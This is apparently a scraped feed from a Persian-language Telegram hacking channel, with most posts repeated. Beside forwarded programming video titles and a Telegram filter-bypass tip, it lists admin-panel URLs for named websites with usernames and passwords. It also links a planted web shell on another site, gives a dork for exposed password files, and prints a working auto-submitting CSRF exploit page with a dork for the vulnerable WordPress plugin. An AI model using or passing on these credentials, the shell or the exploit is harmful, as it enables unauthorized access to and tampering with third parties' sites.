چند نمونه از موتور های جستوجوی Deep web یا وب عمیق رو در زیر مشاهده می کنید:
- The WWW Virtual Library
- Collection of Deep web research tools
- Surfwax
- icerocket
- stumpedia
#0daytoday
@LearnExploit
- The WWW Virtual Library
- Collection of Deep web research tools
- Surfwax
- icerocket
- stumpedia
#0daytoday
@LearnExploit
Forwarded from کانال رسمی بازی سازی با بیلدباکس (!#!)
Media is too big
VIEW IN TELEGRAM
اگه میخواید بصورت خیلی ساده و راحت متوجه بشید که آسیب پذیری Xss از نوع Dom چی هستش این ویدیو رو ببینید...
Forwarded from never lose hope
This media is not supported in your browser
VIEW IN TELEGRAM
درک برنامه نویسی جادی - ۰۰۱ - شروع
Forwarded from utubebot
Media is too big
VIEW IN TELEGRAM
درک برنامه نویسی جادی - ۰۰۲ - ساده ترین دستور: پرینت
Forwarded from never lose hope
This media is not supported in your browser
VIEW IN TELEGRAM
درک برنامه نویسی جادی - ۰۰۳ - شرط ایف
Forwarded from never lose hope
Media is too big
VIEW IN TELEGRAM
درک برنامه نویسی جادی - ۰۰۴ - برنامه نوشتن در یک فایل
#Admin_Panel
****************
http://www.adawatint.com/manage/login.php
User:admin
Pass:admin
****************
@LearnExploit
****************
http://www.adawatint.com/manage/login.php
User:admin
Pass:admin
****************
@LearnExploit
#Admin_Panel
****************
http://hockman.ru/login.php
User:Montreal Canadiens
Pass:Montreal Canadiens
****************
@LearnExploit
****************
http://hockman.ru/login.php
User:Montreal Canadiens
Pass:Montreal Canadiens
****************
@LearnExploit
#Admin_Panel
****************
http://www.riosdevida.com/login.php
User: pablo.sparta@riosdevida.com
Pass:psparta
****************
@LearnExploit
****************
http://www.riosdevida.com/login.php
User: pablo.sparta@riosdevida.com
Pass:psparta
****************
@LearnExploit
#Admin_Panel
****************
http://ofertasb.com/admin/
User:Jose
Pass:Bola_2016
****************
@LearnExploit
****************
http://ofertasb.com/admin/
User:Jose
Pass:Bola_2016
****************
@LearnExploit
#Admin_Panel
****************
http://razzledazzleevents.in/admin/
User:admin
Pass:admin123
****************
@LearnExploit
****************
http://razzledazzleevents.in/admin/
User:admin
Pass:admin123
****************
@LearnExploit
#AccessShell
******************
http://rxacademic.in/mini.php
دوستان شل پاک نشه
******************
@LearnExploit
******************
http://rxacademic.in/mini.php
دوستان شل پاک نشه
******************
@LearnExploit
#Dork #Passwd
Dork :
استفاده کنید 🙌🏻
Dork By یکی ازدوستان
-------
@LearnExplit
Dork :
intitle:"Index of" pass.txt
استفاده کنید 🙌🏻
Dork By یکی ازدوستان
-------
@LearnExplit
#CSRF #vulnerabilities in #WP #Add_Mime_Types #Plugin <= 2.2.1
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
----
@LearnExploit
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
----
@LearnExploit
#CSRF #vulnerabilities in #WP #Add_Mime_Types #Plugin <= 2.2.1
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
➖➖➖➖➖➖➖➖➖
#Description :
این افزونه به شما این اجازه رو میده که فایل هایی با فرمت مختلف روی سایت وردپرسی خودتان اپلود کنید.
➖➖➖➖➖➖➖➖
⚫️امکانات ویژه افزونه WP Add Mime Types:
🔴رابط کاربری بسیار آسان
🔴قابلیت افزودن فرمتهای مختلف
🔴دارای تقریباً ۹۰ نوع فرمت مختلف
🔴قابلیت تعریف فرمتهای دیگر
🔴بهروزرسانیهای مرتب
و...
➖➖➖➖➖➖➖
#Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
➖➖➖➖➖➖➖
#Exploit :
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
<input type="submit">
</form>
</body>
</html>
➖➖➖➖➖➖➖➖➖➖
@LearnExploit 🤟🏻
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
➖➖➖➖➖➖➖➖➖
#Description :
این افزونه به شما این اجازه رو میده که فایل هایی با فرمت مختلف روی سایت وردپرسی خودتان اپلود کنید.
➖➖➖➖➖➖➖➖
⚫️امکانات ویژه افزونه WP Add Mime Types:
🔴رابط کاربری بسیار آسان
🔴قابلیت افزودن فرمتهای مختلف
🔴دارای تقریباً ۹۰ نوع فرمت مختلف
🔴قابلیت تعریف فرمتهای دیگر
🔴بهروزرسانیهای مرتب
و...
➖➖➖➖➖➖➖
#Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
➖➖➖➖➖➖➖
#Exploit :
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
<input type="submit">
</form>
</body>
</html>
➖➖➖➖➖➖➖➖➖➖
@LearnExploit 🤟🏻
📬 رفع فیلتر تلگرام
*********************************************************
۱- تلگرام اصلی رو به اخرین نسخش بروزرسانی کنید.
۲- برید داخل فیلترشکنتون و کشور روسیه رو برای وصل شدن فیلترشکنتون انتخاب کنید.
۳- بعد اینکه فیلترشکنتون با آیپی کشور روسیه وصل شد حالا بیاید داخل تلگرامتون. کافیه فقط ۵ دقیقه تو اون حالت که فیلترشکنتون وصله تو تلگرام باشید. و بعدش دیگه فیلترشکنو خاموش کنید و برای همیشه رفع فیلتر میشید.
نکته: اگر تلگرامتون بعد از انجام این روشها رفع فیلتر نشد. فیلترشکنتون رو عوض کنید و دوباره مراحل رو انجام بدین
درضمن اگه هم با وایفا هم با نت وصل میشید برای هر دو باید سوا سوا مراحل رو انجام بدین. مثلا اگه با وای فای مراحل رفع فیلترو انجام بدی و درست بشه. اما بعدش که با نت بری داخل تلگرام باز فیلتره. پس برا هر کدوم سوا سوا مراحل رو انجام بدین...
این روش تست شده با HMA VPN و جواب داده👌
*********************************************************
@LearnExploit
*********************************************************
۱- تلگرام اصلی رو به اخرین نسخش بروزرسانی کنید.
۲- برید داخل فیلترشکنتون و کشور روسیه رو برای وصل شدن فیلترشکنتون انتخاب کنید.
۳- بعد اینکه فیلترشکنتون با آیپی کشور روسیه وصل شد حالا بیاید داخل تلگرامتون. کافیه فقط ۵ دقیقه تو اون حالت که فیلترشکنتون وصله تو تلگرام باشید. و بعدش دیگه فیلترشکنو خاموش کنید و برای همیشه رفع فیلتر میشید.
نکته: اگر تلگرامتون بعد از انجام این روشها رفع فیلتر نشد. فیلترشکنتون رو عوض کنید و دوباره مراحل رو انجام بدین
درضمن اگه هم با وایفا هم با نت وصل میشید برای هر دو باید سوا سوا مراحل رو انجام بدین. مثلا اگه با وای فای مراحل رفع فیلترو انجام بدی و درست بشه. اما بعدش که با نت بری داخل تلگرام باز فیلتره. پس برا هر کدوم سوا سوا مراحل رو انجام بدین...
این روش تست شده با HMA VPN و جواب داده👌
*********************************************************
@LearnExploit